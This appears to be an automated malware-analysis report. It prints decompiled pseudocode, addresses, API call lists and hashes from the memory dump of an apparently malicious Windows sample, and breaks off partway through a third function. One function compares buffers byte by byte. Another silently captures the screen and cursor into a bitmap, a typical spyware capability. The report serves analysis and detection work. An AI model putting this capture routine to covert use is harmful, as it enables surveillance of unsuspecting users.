                              0x004227ae
                              0x0042225e
                              0x0042225e
                              0x0042225e
                              0x0042225c
                              0x00422253
                              0x004227b9

                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6dcb447a85b1182a68abc09f72ac54cd806021c874cec78a4556c29f23593adf
                              • Instruction ID: 73839bb05d6e719aa0e6431676c5ad9225ade293482c4aaa0957e560a066960c
                              • Opcode Fuzzy Hash: 6dcb447a85b1182a68abc09f72ac54cd806021c874cec78a4556c29f23593adf
                              • Instruction Fuzzy Hash: 6B029F716005518FC358CF2EEC9056AB7E1EF8E301748853AE486C73A5EB74E922DF94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0043424F, Relevance: .3, Instructions: 341COMMONCrypto
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E0043424F(void* __edx, void* __esi) {
				signed int _t197;
				signed char _t198;
				signed char _t199;
				signed char _t200;
				signed char _t202;
				signed char _t203;
				signed int _t246;
				void* _t294;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t327;
				void* _t329;
				void* _t331;
				void* _t333;
				void* _t335;
				void* _t336;

				_t336 = __esi;
				_t294 = __edx;
				if( *((intOrPtr*)(__esi - 0x1f)) ==  *((intOrPtr*)(__edx - 0x1f))) {
					_t246 = 0;
					L14:
					if(_t246 != 0) {
						goto L1;
					}
					_t198 =  *(_t336 - 0x1b);
					if(_t198 ==  *(_t294 - 0x1b)) {
						_t246 = 0;
						L25:
						if(_t246 != 0) {
							goto L1;
						}
						_t199 =  *(_t336 - 0x17);
						if(_t199 ==  *(_t294 - 0x17)) {
							_t246 = 0;
							L36:
							if(_t246 != 0) {
								goto L1;
							}
							_t200 =  *(_t336 - 0x13);
							if(_t200 ==  *(_t294 - 0x13)) {
								_t246 = 0;
								L47:
								if(_t246 != 0) {
									goto L1;
								}
								if( *(_t336 - 0xf) ==  *(_t294 - 0xf)) {
									_t246 = 0;
									L58:
									if(_t246 != 0) {
										goto L1;
									}
									_t202 =  *(_t336 - 0xb);
									if(_t202 ==  *(_t294 - 0xb)) {
										_t246 = 0;
										L69:
										if(_t246 != 0) {
											goto L1;
										}
										_t203 =  *(_t336 - 7);
										if(_t203 ==  *(_t294 - 7)) {
											_t246 = 0;
											L80:
											if(_t246 != 0) {
												goto L1;
											}
											_t297 = ( *(_t336 - 3) & 0x000000ff) - ( *(_t294 - 3) & 0x000000ff);
											if(_t297 == 0) {
												L83:
												_t299 = ( *(_t336 - 2) & 0x000000ff) - ( *(_t294 - 2) & 0x000000ff);
												if(_t299 == 0) {
													L3:
													_t246 = ( *(_t336 - 1) & 0x000000ff) - ( *(_t294 - 1) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
													goto L1;
												}
												_t246 = (0 | _t299 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												} else {
													goto L3;
												}
											}
											_t246 = (0 | _t297 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L83;
										}
										_t301 = (_t203 & 0x000000ff) - ( *(_t294 - 7) & 0x000000ff);
										if(_t301 == 0) {
											L73:
											_t303 = ( *(_t336 - 6) & 0x000000ff) - ( *(_t294 - 6) & 0x000000ff);
											if(_t303 == 0) {
												L75:
												_t305 = ( *(_t336 - 5) & 0x000000ff) - ( *(_t294 - 5) & 0x000000ff);
												if(_t305 == 0) {
													L77:
													_t246 = ( *(_t336 - 4) & 0x000000ff) - ( *(_t294 - 4) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
													goto L80;
												}
												_t246 = (0 | _t305 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												}
												goto L77;
											}
											_t246 = (0 | _t303 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L75;
										}
										_t246 = (0 | _t301 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L73;
									}
									_t307 = (_t202 & 0x000000ff) - ( *(_t294 - 0xb) & 0x000000ff);
									if(_t307 == 0) {
										L62:
										_t309 = ( *(_t336 - 0xa) & 0x000000ff) - ( *(_t294 - 0xa) & 0x000000ff);
										if(_t309 == 0) {
											L64:
											_t311 = ( *(_t336 - 9) & 0x000000ff) - ( *(_t294 - 9) & 0x000000ff);
											if(_t311 == 0) {
												L66:
												_t246 = ( *(_t336 - 8) & 0x000000ff) - ( *(_t294 - 8) & 0x000000ff);
												if(_t246 != 0) {
													_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
												}
												goto L69;
											}
											_t246 = (0 | _t311 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L66;
										}
										_t246 = (0 | _t309 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L64;
									}
									_t246 = (0 | _t307 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L62;
								}
								_t313 = ( *(_t336 - 0xf) & 0x000000ff) - ( *(_t294 - 0xf) & 0x000000ff);
								if(_t313 == 0) {
									L51:
									_t315 = ( *(_t336 - 0xe) & 0x000000ff) - ( *(_t294 - 0xe) & 0x000000ff);
									if(_t315 == 0) {
										L53:
										_t317 = ( *(_t336 - 0xd) & 0x000000ff) - ( *(_t294 - 0xd) & 0x000000ff);
										if(_t317 == 0) {
											L55:
											_t246 = ( *(_t336 - 0xc) & 0x000000ff) - ( *(_t294 - 0xc) & 0x000000ff);
											if(_t246 != 0) {
												_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
											}
											goto L58;
										}
										_t246 = (0 | _t317 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L55;
									}
									_t246 = (0 | _t315 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L53;
								}
								_t246 = (0 | _t313 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L51;
							}
							_t319 = (_t200 & 0x000000ff) - ( *(_t294 - 0x13) & 0x000000ff);
							if(_t319 == 0) {
								L40:
								_t321 = ( *(_t336 - 0x12) & 0x000000ff) - ( *(_t294 - 0x12) & 0x000000ff);
								if(_t321 == 0) {
									L42:
									_t323 = ( *(_t336 - 0x11) & 0x000000ff) - ( *(_t294 - 0x11) & 0x000000ff);
									if(_t323 == 0) {
										L44:
										_t246 = ( *(_t336 - 0x10) & 0x000000ff) - ( *(_t294 - 0x10) & 0x000000ff);
										if(_t246 != 0) {
											_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
										}
										goto L47;
									}
									_t246 = (0 | _t323 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L44;
								}
								_t246 = (0 | _t321 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L42;
							}
							_t246 = (0 | _t319 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L40;
						}
						_t325 = (_t199 & 0x000000ff) - ( *(_t294 - 0x17) & 0x000000ff);
						if(_t325 == 0) {
							L29:
							_t327 = ( *(_t336 - 0x16) & 0x000000ff) - ( *(_t294 - 0x16) & 0x000000ff);
							if(_t327 == 0) {
								L31:
								_t329 = ( *(_t336 - 0x15) & 0x000000ff) - ( *(_t294 - 0x15) & 0x000000ff);
								if(_t329 == 0) {
									L33:
									_t246 = ( *(_t336 - 0x14) & 0x000000ff) - ( *(_t294 - 0x14) & 0x000000ff);
									if(_t246 != 0) {
										_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
									}
									goto L36;
								}
								_t246 = (0 | _t329 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L33;
							}
							_t246 = (0 | _t327 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L31;
						}
						_t246 = (0 | _t325 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L29;
					}
					_t331 = (_t198 & 0x000000ff) - ( *(_t294 - 0x1b) & 0x000000ff);
					if(_t331 == 0) {
						L18:
						_t333 = ( *(_t336 - 0x1a) & 0x000000ff) - ( *(_t294 - 0x1a) & 0x000000ff);
						if(_t333 == 0) {
							L20:
							_t335 = ( *(_t336 - 0x19) & 0x000000ff) - ( *(_t294 - 0x19) & 0x000000ff);
							if(_t335 == 0) {
								L22:
								_t246 = ( *(_t336 - 0x18) & 0x000000ff) - ( *(_t294 - 0x18) & 0x000000ff);
								if(_t246 != 0) {
									_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
								}
								goto L25;
							}
							_t246 = (0 | _t335 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L22;
						}
						_t246 = (0 | _t333 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L20;
					}
					_t246 = (0 | _t331 > 0x00000000) * 2 - 1;
					if(_t246 != 0) {
						goto L1;
					}
					goto L18;
				} else {
					__edi =  *(__esi - 0x1f) & 0x000000ff;
					__edi = ( *(__esi - 0x1f) & 0x000000ff) - ( *(__edx - 0x1f) & 0x000000ff);
					if(__edi == 0) {
						L7:
						__edi =  *(__esi - 0x1e) & 0x000000ff;
						__edi = ( *(__esi - 0x1e) & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
						if(__edi == 0) {
							L9:
							__edi =  *(__esi - 0x1d) & 0x000000ff;
							__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
							if(__edi == 0) {
								L11:
								__ecx =  *(__esi - 0x1c) & 0x000000ff;
								__ecx = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L14;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L11;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L9;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L7;
				}
				L1:
				_t197 = _t246;
				return _t197;
			}
































                              0x0043424f
                              0x0043424f
                              0x00434255
                              0x004342dd
                              0x004342df
                              0x004342e1
                              0x00000000
                              0x00000000
                              0x004342e7
                              0x004342ed
                              0x00434374
                              0x00434376
                              0x00434378
                              0x00000000
                              0x00000000
                              0x0043437e
                              0x00434384
                              0x0043440b
                              0x0043440d
                              0x0043440f
                              0x00000000
                              0x00000000
                              0x00434415
                              0x0043441b
                              0x004344a2
                              0x004344a4
                              0x004344a6
                              0x00000000
                              0x00000000
                              0x004344b2
                              0x0043453a
                              0x0043453c
                              0x0043453e
                              0x00000000
                              0x00000000
                              0x00434544
                              0x0043454a
                              0x004345d1
                              0x004345d3
                              0x004345d5
                              0x00000000
                              0x00000000
                              0x004345db
                              0x004345e1
                              0x00434668
                              0x0043466a
                              0x0043466c
                              0x00000000
                              0x00000000
                              0x0043467a
                              0x0043467c
                              0x00434694
                              0x0043469c
                              0x0043469e
                              0x00433df7
                              0x00433dff
                              0x00433e01
                              0x00433e0e
                              0x00433e0e
                              0x00000000
                              0x00433e01
                              0x004346ab
                              0x00433df1
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00433df1
                              0x00434685
                              0x0043468e
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0043468e
                              0x004345ee
                              0x004345f0
                              0x00434608
                              0x00434610
                              0x00434612
                              0x0043462a
                              0x00434632
                              0x00434634
                              0x0043464c
                              0x00434654
                              0x00434656
                              0x0043465f
                              0x0043465f
                              0x00000000
                              0x00434656
                              0x0043463d
                              0x00434646
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00434646
                              0x0043461b
                              0x00434624
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00434624
                              0x004345f9
                              0x00434602
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00434602
                              0x00434557
                              0x00434559
                              0x00434571
                              0x00434579
                              0x0043457b
                              0x00434593
                              0x0043459b
                              0x0043459d
                              0x004345b5
                              0x004345bd
                              0x004345bf
                              0x004345c8
                              0x004345c8
                              0x00000000
                              0x004345bf
                              0x004345a6
                              0x004345af
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004345af
                              0x00434584
                              0x0043458d
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0043458d
                              0x00434562
                              0x0043456b
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0043456b
                              0x004344c0
                              0x004344c2
                              0x004344da
                              0x004344e2
                              0x004344e4
                              0x004344fc
                              0x00434504
                              0x00434506
                              0x0043451e
                              0x00434526
                              0x00434528
                              0x00434531
                              0x00434531
                              0x00000000
                              0x00434528
                              0x0043450f
                              0x00434518
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00434518
                              0x004344ed
                              0x004344f6
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004344f6
                              0x004344cb
                              0x004344d4
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004344d4
                              0x00434428
                              0x0043442a
                              0x00434442
                              0x0043444a
                              0x0043444c
                              0x00434464
                              0x0043446c
                              0x0043446e
                              0x00434486
                              0x0043448e
                              0x00434490
                              0x00434499
                              0x00434499
                              0x00000000
                              0x00434490
                              0x00434477
                              0x00434480
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00434480
                              0x00434455
                              0x0043445e
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0043445e
                              0x00434433
                              0x0043443c
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0043443c
                              0x00434391
                              0x00434393
                              0x004343ab
                              0x004343b3
                              0x004343b5
                              0x004343cd
                              0x004343d5
                              0x004343d7
                              0x004343ef
                              0x004343f7
                              0x004343f9
                              0x00434402
                              0x00434402
                              0x00000000
                              0x004343f9
                              0x004343e0
                              0x004343e9
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004343e9
                              0x004343be
                              0x004343c7
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004343c7
                              0x0043439c
                              0x004343a5
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004343a5
                              0x004342fa
                              0x004342fc
                              0x00434314
                              0x0043431c
                              0x0043431e
                              0x00434336
                              0x0043433e
                              0x00434340
                              0x00434358
                              0x00434360
                              0x00434362
                              0x0043436b
                              0x0043436b
                              0x00000000
                              0x00434362
                              0x00434349
                              0x00434352
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00434352
                              0x00434327
                              0x00434330
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00434330
                              0x00434305
                              0x0043430e
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0043425b
                              0x0043425f
                              0x00434263
                              0x00434265
                              0x0043427d
                              0x0043427d
                              0x00434285
                              0x00434287
                              0x0043429f
                              0x0043429f
                              0x004342a7
                              0x004342a9
                              0x004342c1
                              0x004342c1
                              0x004342c9
                              0x004342cb
                              0x004342d4
                              0x004342d4
                              0x00000000
                              0x004342cb
                              0x004342af
                              0x004342b2
                              0x004342bb
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004342bb
                              0x0043428d
                              0x00434290
                              0x00434299
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00434299
                              0x0043426b
                              0x0043426e
                              0x00434277
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00434277
                              0x004339dd
                              0x004339dd
                              0x004347ce

                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                              • Instruction ID: 408e5dc9d1f9a891ea97fd5a4050b58cd4f2d4fd4c8bb63a7fc0ce09d4585151
                              • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                              • Instruction Fuzzy Hash: 84C1E9722050934ADF2D4A39C43517FBAA15EE67B271A236FD4F2CB2C4EE18E624D614
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004142A5, Relevance: 51.0, APIs: 27, Strings: 2, Instructions: 298windowmemoryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 81%
                              			E004142A5(void* __ecx, char __edx, void* __eflags, signed int _a4) {
				void* _v12;
				char _v13;
				struct HDC__* _v20;
				signed int _v24;
				signed int _v28;
				int _v32;
				int _v36;
				struct HDC__* _v40;
				void* _v46;
				intOrPtr _v50;
				intOrPtr _v54;
				char _v56;
				char _v80;
				intOrPtr _v84;
				struct tagCURSORINFO _v100;
				signed int _v106;
				signed int _v108;
				long _v116;
				long _v120;
				char _v124;
				struct _ICONINFO _v144;
				char _v168;
				void* __ebx;
				int _t114;
				void* _t115;
				void* _t116;
				void* _t120;
				int _t127;
				void* _t128;
				signed char _t140;
				long _t146;
				void* _t147;
				int _t149;
				void* _t157;
				void* _t186;
				void* _t188;
				void* _t194;
				int _t199;
				void* _t204;
				void* _t223;
				signed int _t226;
				struct HDC__* _t228;
				struct HDC__* _t232;
				struct tagBITMAPINFO* _t234;
				void* _t235;
				int _t241;

				_v13 = __edx;
				_t194 = __ecx;
				_t232 = CreateDCA("DISPLAY", 0, 0, 0);
				_v20 = _t232;
				_t228 = CreateCompatibleDC(_t232);
				_v40 = _t228;
				_v32 = L004146DC( *((intOrPtr*)(0x46bd78 + _a4 * 4)));
				_t114 = L00414728( *((intOrPtr*)(0x46bd78 + _a4 * 4)));
				_t199 = _v32;
				_v36 = _t114;
				if(_t199 != 0 || _t114 != 0) {
					_t115 = CreateCompatibleBitmap(_t232, _t199, _t114);
					_v12 = _t115;
					__eflags = _t115;
					if(_t115 != 0) {
						_t116 = SelectObject(_t228, _t115);
						__eflags = _t116;
						if(_t116 != 0) {
							_v28 = _v28 & 0x00000000;
							_v24 = _v24 & 0x00000000;
							L00414769( *((intOrPtr*)(0x46bd78 + _a4 * 4)),  &_v28);
							_t120 = StretchBlt(_t228, 0, 0, _v32, _v36, _t232, _v28, _v24, _v32, _v36, 0xcc0020);
							__eflags = _t120;
							if(_t120 == 0) {
								goto L7;
							}
							__eflags = _v13;
							if(_v13 != 0) {
								_v100.cbSize = 0x14;
								_t186 = GetCursorInfo( &_v100);
								__eflags = _t186;
								if(_t186 != 0) {
									_t188 = GetIconInfo(_v100.hCursor,  &_v144);
									__eflags = _t188;
									if(_t188 != 0) {
										_t241 = _v84 - _v144.yHotspot - _v24;
										__eflags = _t241;
										DeleteObject(_v144.hbmColor);
										DeleteObject(_v144.hbmMask);
										_t228 = _v40;
										DrawIcon(_t228, _v100.ptScreenPos - _v144.xHotspot - _v28, _t241, _v100.hCursor);
										_t232 = _v20;
									}
								}
							}
							_push( &_v124);
							_t127 = 0x18;
							_t128 = GetObjectA(_v12, _t127, ??);
							__eflags = _t128;
							if(_t128 == 0) {
								goto L7;
							} else {
								_t226 = _v106 * _v108 & 0x0000ffff;
								__eflags = _t226 - 1;
								if(_t226 != 1) {
									_push(4);
									_pop(1);
									_a4 = 1;
									__eflags = _t226 - 1;
									if(_t226 <= 1) {
										L24:
										__eflags = 1 << 1;
										_push(0x2eb6edc);
										L25:
										_t234 = LocalAlloc(0x40, ??);
										_t204 = 0x18;
										_t234->bmiHeader = 0x28;
										_t234->bmiHeader.biWidth = _v120;
										_t234->bmiHeader.biHeight = _v116;
										_t234->bmiHeader.biPlanes = _v108;
										_t234->bmiHeader.biBitCount = _v106;
										_t140 = _a4;
										__eflags = _t140 - _t204;
										if(_t140 < _t204) {
											__eflags = 1;
											_t234->bmiHeader.biClrUsed = 1 << _t140;
										}
										_t234->bmiHeader.biCompression = _t234->bmiHeader.biCompression & 0x00000000;
										_t234->bmiHeader.biClrImportant = _t234->bmiHeader.biClrImportant & 0x00000000;
										asm("cdq");
										_t227 = _t226 & 0x00000007;
										_t146 = (_t234->bmiHeader.biWidth + 7 + (_t226 & 0x00000007) >> 3) * (_a4 & 0x0000ffff) * _t234->bmiHeader.biHeight;
										_t234->bmiHeader.biSizeImage = _t146;
										_t147 = GlobalAlloc(0, _t146);
										_a4 = _t147;
										__eflags = _t147;
										if(_t147 != 0) {
											_t149 = GetDIBits(_t228, _v12, 0, _t234->bmiHeader.biHeight & 0x0000ffff, _t147, _t234, 0);
											__eflags = _t149;
											if(_t149 != 0) {
												_v56 = 0x4d42;
												_v54 = _t234->bmiHeader + _t234->bmiHeader.biSizeImage + _t234->bmiHeader.biClrUsed * 4 + 0xe;
												_v50 = 0;
												_t157 = _t234->bmiHeader + _t234->bmiHeader.biClrUsed * 4 + 0xe;
												__eflags = _t157;
												_v46 = _t157;
												E004020B5(_t194,  &_v80);
												E004020B5(_t194,  &_v168);
												L004024FD(_t194,  &_v80, _t227, __eflags,  &_v56, 0xe);
												L00403416( &_v80);
												L004024FD(_t194,  &_v80, _t227, __eflags, _t234, 0x28);
												L00403416( &_v80);
												_t235 = _a4;
												L004024FD(_t194,  &_v80, _t227, __eflags, _t235, _t234->bmiHeader.biSizeImage);
												L00403416( &_v80);
												DeleteObject(_v12);
												GlobalFree(_t235);
												DeleteDC(_v20);
												DeleteDC(_t228);
												E00402024(_t194, _t194, __eflags,  &_v168);
												L00401FA7();
												L00401FA7();
												goto L32;
											}
											DeleteDC(_v20);
											DeleteDC(_t228);
											DeleteObject(_v12);
											GlobalFree(_a4);
											goto L2;
										} else {
											_push(_v20);
											L8:
											DeleteDC();
											DeleteDC(_t228);
											_push(_v12);
											goto L5;
										}
									}
									_push(8);
									_pop(1);
									_a4 = 1;
									__eflags = _t226 - 1;
									if(_t226 <= 1) {
										goto L24;
									}
									_push(0x10);
									_pop(1);
									_a4 = 1;
									__eflags = _t226 - 1;
									if(_t226 <= 1) {
										goto L24;
									}
									_t223 = 0x18;
									__eflags = _t226 - _t223;
									if(_t226 > _t223) {
										_push(0x20);
										_pop(1);
										L23:
										_a4 = 1;
										goto L24;
									}
									_a4 = _t223;
									_push(0x28);
									goto L25;
								}
								goto L23;
							}
						}
						L7:
						_push(_t232);
						goto L8;
					} else {
						DeleteDC(_t232);
						DeleteDC(_t228);
						_push(0);
						L5:
						DeleteObject();
						goto L2;
					}
				} else {
					L2:
					E00402064(_t194, _t194, 0x45f6ac);
					L32:
					return _t194;
				}
			}

















































                              0x004142b3
                              0x004142be
                              0x004142c6
                              0x004142c9
                              0x004142d5
                              0x004142d7
                              0x004142e6
                              0x004142f3
                              0x004142f8
                              0x004142fb
                              0x00414300
                              0x0041431a
                              0x00414320
                              0x00414323
                              0x00414325
                              0x0041433f
                              0x00414345
                              0x00414347
                              0x00414360
                              0x00414364
                              0x0041436f
                              0x0041438f
                              0x00414395
                              0x00414397
                              0x00000000
                              0x00000000
                              0x00414399
                              0x0041439d
                              0x004143a2
                              0x004143aa
                              0x004143b0
                              0x004143b2
                              0x004143be
                              0x004143c4
                              0x004143c6
                              0x004143e0
                              0x004143e0
                              0x004143e3
                              0x004143ec
                              0x004143f7
                              0x004143fb
                              0x00414401
                              0x00414401
                              0x004143c6
                              0x004143b2
                              0x00414407
                              0x0041440a
                              0x0041440f
                              0x00414415
                              0x00414417
                              0x00000000
                              0x0041441d
                              0x00414424
                              0x0041442a
                              0x0041442d
                              0x00414433
                              0x00414435
                              0x00414436
                              0x00414439
                              0x0041443c
                              0x00414469
                              0x00414469
                              0x00414472
                              0x00414473
                              0x0041447b
                              0x0041447f
                              0x00414480
                              0x00414489
                              0x0041448f
                              0x00414496
                              0x0041449e
                              0x004144a2
                              0x004144a5
                              0x004144a8
                              0x004144af
                              0x004144b1
                              0x004144b1
                              0x004144bd
                              0x004144c1
                              0x004144c5
                              0x004144c6
                              0x004144d4
                              0x004144db
                              0x004144de
                              0x004144e4
                              0x004144e7
                              0x004144e9
                              0x00414502
                              0x00414508
                              0x0041450a
                              0x00414537
                              0x0041454b
                              0x00414550
                              0x0041455b
                              0x0041455b
                              0x00414561
                              0x00414564
                              0x0041456f
                              0x0041457d
                              0x0041458c
                              0x00414597
                              0x004145a6
                              0x004145ae
                              0x004145b5
                              0x004145c4
                              0x004145cc
                              0x004145d3
                              0x004145e2
                              0x004145e5
                              0x004145f0
                              0x004145fb
                              0x00414603
                              0x00000000
                              0x00414603
                              0x00414515
                              0x00414518
                              0x0041451d
                              0x00414527
                              0x00000000
                              0x004144eb
                              0x004144eb
                              0x0041434a
                              0x00414350
                              0x00414353
                              0x00414355
                              0x00000000
                              0x00414355
                              0x004144e9
                              0x0041443e
                              0x00414440
                              0x00414441
                              0x00414444
                              0x00414447
                              0x00000000
                              0x00000000
                              0x00414449
                              0x0041444b
                              0x0041444c
                              0x0041444f
                              0x00414452
                              0x00000000
                              0x00000000
                              0x00414456
                              0x00414457
                              0x0041445a
                              0x00414463
                              0x00414465
                              0x00414466
                              0x00414466
                              0x00000000
                              0x00414466
                              0x0041445c
                              0x0041445f
                              0x00000000
                              0x0041445f
                              0x00000000
                              0x0041442f
                              0x00414417
                              0x00414349
                              0x00414349
                              0x00000000
                              0x00414327
                              0x0041432e
                              0x00414331
                              0x00414333
                              0x00414335
                              0x00414335
                              0x00000000
                              0x00414335
                              0x00414306
                              0x00414306
                              0x0041430d
                              0x0041460a
                              0x00414610
                              0x00414610

                              APIs
                              • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004142C0
                              • CreateCompatibleDC.GDI32(00000000), ref: 004142CC
                                • Part of subcall function 004146DC: GetMonitorInfoW.USER32(?,?), ref: 004146FC
                                • Part of subcall function 00414728: GetMonitorInfoW.USER32(?,?), ref: 00414748
                              • CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 0041431A
                              • DeleteDC.GDI32(00000000), ref: 0041432E
                              • DeleteDC.GDI32(00000000), ref: 00414331
                              • DeleteObject.GDI32(?), ref: 00414335
                              • SelectObject.GDI32(00000000,00000000), ref: 0041433F
                              • DeleteDC.GDI32(00000000), ref: 00414350
                              • DeleteDC.GDI32(00000000), ref: 00414353
                              • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041438F
                              • GetCursorInfo.USER32(?,?,?), ref: 004143AA
                              • GetIconInfo.USER32(?,?), ref: 004143BE
                              • DeleteObject.GDI32(?), ref: 004143E3
                              • DeleteObject.GDI32(?), ref: 004143EC
                              • DrawIcon.USER32 ref: 004143FB
                              • GetObjectA.GDI32(?,00000018,?), ref: 0041440F
                              • LocalAlloc.KERNEL32(00000040,00000001,?,?), ref: 00414475
                              • GlobalAlloc.KERNEL32(00000000,?,?,?), ref: 004144DE
                              • GetDIBits.GDI32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 00414502
                              • DeleteDC.GDI32(?), ref: 00414515
                              • DeleteDC.GDI32(00000000), ref: 00414518
                              • DeleteObject.GDI32(?), ref: 0041451D
                              • GlobalFree.KERNEL32 ref: 00414527
                              • DeleteObject.GDI32(?), ref: 004145CC
                              • GlobalFree.KERNEL32 ref: 004145D3
                              • DeleteDC.GDI32(?), ref: 004145E2
                              • DeleteDC.GDI32(00000000), ref: 004145E5
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: Delete$Object$Info$CreateGlobal$AllocCompatibleFreeIconMonitor$BitmapBitsCursorDrawLocalSelectStretch
                              • String ID: DISPLAY$d?A
                              • API String ID: 517350757-979833423
                              • Opcode ID: cb00ee02b850786815a41c7fce795d2d79e314af86b36145e7d8f5b216eac82f
                              • Instruction ID: 5f48c5219878f18165c8a10fe86ed1b3fa979366dd0a80e665ef025d0f654af7
                              • Opcode Fuzzy Hash: cb00ee02b850786815a41c7fce795d2d79e314af86b36145e7d8f5b216eac82f
                              • Instruction Fuzzy Hash: 1AB18075A00319AFDB10DFA0DC45BEEBBB8EF44752F00402AF945E7291DB74AA85CB58
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0041636B, Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 185synchronizationCOMMON
                              Download Yara Rule
                              C-Code - Quality: 86%
                              			E0041636B(void* __ecx, void* __edx, char _a4) {
				char _v24;
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t25;
				void* _t28;
				void* _t43;
				void* _t60;
				void* _t63;
				void* _t67;
				CHAR* _t89;
				void* _t109;
				CHAR* _t110;
				void* _t111;
				void* _t114;
				void* _t118;

				_t103 = __edx;
				_t67 = __ecx;
				_t109 = __edx;
				if(L004165B1( &_a4, __ecx, __ecx) == 0xffffffff) {
					_t63 = L00401ECB( &_a4);
